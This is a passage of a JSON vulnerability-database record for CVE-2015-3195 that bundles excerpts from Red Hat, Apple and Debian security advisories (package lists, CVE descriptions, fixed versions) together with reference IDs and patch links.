CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1326320 - CVE-2016-3110 mod_cluster: remotely Segfault Apache http server\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute\n1345989 - RHEL7 RPMs: Upgrade mod_cluster-native to 1.2.13.Final-redhat-1\n1345993 - RHEL7 RPMs: Upgrade mod_jk to 1.2.41.redhat-1\n1345997 - RHEL7 RPMs: Upgrade tomcat-native to 1.1.34\n\n6. Package List:\n\nRed Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server:\n\nSource:\nhornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.src.rpm\nhttpd22-2.2.26-56.ep6.el7.src.rpm\njbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.src.rpm\nmod_jk-1.2.41-2.redhat_4.ep6.el7.src.rpm\ntomcat-native-1.1.34-5.redhat_1.ep6.el7.src.rpm\n\nnoarch:\njbcs-httpd24-1-3.jbcs.el7.noarch.rpm\njbcs-httpd24-runtime-1-3.jbcs.el7.noarch.rpm\n\nppc64:\nhornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm\nhornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm\nhttpd22-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-debuginfo-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-devel-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-manual-2.2.26-56.ep6.el7.ppc64.rpm\nhttpd22-tools-2.2.26-56.ep6.el7.ppc64.rpm\njbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.ppc64.rpm\njbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm\njbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm\nmod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm\nmod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm\nmod_ldap22-2.2.26-56.ep6.el7.ppc64.rpm\nmod_ssl22-2.2.26-56.ep6.el7.ppc64.rpm\ntomcat-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm\ntomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm\n\nx86_64:\nhornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm\nhornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm\nhttpd22-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-debuginfo-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-devel-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-manual-2.2.26-56.ep6.el7.x86_64.rpm\nhttpd22-tools-2.2.26-56.ep6.el7.x86_64.rpm\njbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.x86_64.rpm\njbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm\njbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm\nmod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm\nmod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm\nmod_ldap22-2.2.26-56.ep6.el7.x86_64.rpm\nmod_ssl22-2.2.26-56.ep6.el7.x86_64.rpm\ntomcat-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm\ntomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-3183\nhttps://access.redhat.com/security/cve/CVE-2015-3195\nhttps://access.redhat.com/security/cve/CVE-2015-4000\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-3110\nhttps://access.redhat.com/security/cve/CVE-2016-4459\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/2688611\nhttps://access.redhat.com/solutions/222023\nhttps://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/6.4/index.html\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=appplatform\u0026downloadType=securityPatches\u0026version=6.4\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX/nCuXlSAg2UNWIIRAq6gAKCk3O4+LVrC6nN6yUHOOzpm8GB7NQCcDcA0\nn7n6E5uqbAY0W1AG5Z+9yy8=\n=6ET2\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription:  Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local user may be able to determine kernel memory layout\nDescription:  An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription:  Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription:  A code signing verification issue existed in dyld. This\nissue was addressed with improved validation. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local user may be able to cause a denial of service\nDescription:  A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to determine kernel memory layout\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to determine kernel memory layout\nDescription:  An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to cause a denial of service\nDescription:  A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription:  A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription:  An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription:  Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for:  OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact:  Multiple vulnerabilities in LibreSSL\nDescription:  Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A remote attacker may be able to cause a denial of service\nDescription:  A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription:  Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Clicking a tel link can make a call without prompting the\nuser\nDescription:  A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription:  An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. This issue was addressed by updating to\nversion 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local user may be able to check for the existence of\narbitrary files\nDescription:  A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription:  A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for:  \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription:  Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription:  A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription:  A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. 5 client) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2015-3194\n\n    Loic Jonas Etienne of Qnective AG discovered that the signature\n    verification routines will crash with a NULL pointer dereference if\n    presented with an ASN.1 signature using the RSA PSS algorithm and\n    absent mask generation function parameter. A remote attacker can\n    exploit this flaw to crash any certificate verification operation\n    and mount a denial of service attack. \n\nCVE-2015-3196\n\n    A race condition flaw in the handling of PSK identify hints was\n    discovered, potentially leading to a double free of the identify\n    hint data. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.0.1e-2+deb7u18. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2e-1 or earlier",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "137292"
      },
      {
        "db": "PACKETSTORM",
        "id": "139114"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134783"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      }
    ],
    "trust": 3.06
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-3195",
        "trust": 4.0
      },
      {
        "db": "BID",
        "id": "91787",
        "trust": 1.8
      },
      {
        "db": "BID",
        "id": "78626",
        "trust": 1.8
      },
      {
        "db": "JUNIPER",
        "id": "JSA10733",
        "trust": 1.8
      },
      {
        "db": "JUNIPER",
        "id": "JSA10761",
        "trust": 1.8
      },
      {
        "db": "JUNIPER",
        "id": "JSA10759",
        "trust": 1.8
      },
      {
        "db": "SECTRACK",
        "id": "1034294",
        "trust": 1.8
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.8
      },
      {
        "db": "PULSESECURE",
        "id": "SA40100",
        "trust": 1.8
      },
      {
        "db": "JVN",
        "id": "JVNVU95113540",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU97668313",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "134783",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-81156",
        "trust": 0.1
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-21",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "141239",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137292",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139114",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136346",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139116",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140182",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134632",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "137292"
      },
      {
        "db": "PACKETSTORM",
        "id": "139114"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134783"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "id": "VAR-201512-0484",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:40:42.235000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002",
        "trust": 0.8,
        "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
      },
      {
        "title": "HT206167",
        "trust": 0.8,
        "url": "https://support.apple.com/en-us/ht206167"
      },
      {
        "title": "HT206167",
        "trust": 0.8,
        "url": "https://support.apple.com/ja-jp/ht206167"
      },
      {
        "title": "HPSBMU03590",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085"
      },
      {
        "title": "HPSBMU03611",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888"
      },
      {
        "title": "HPSBMU03612",
        "trust": 0.8,
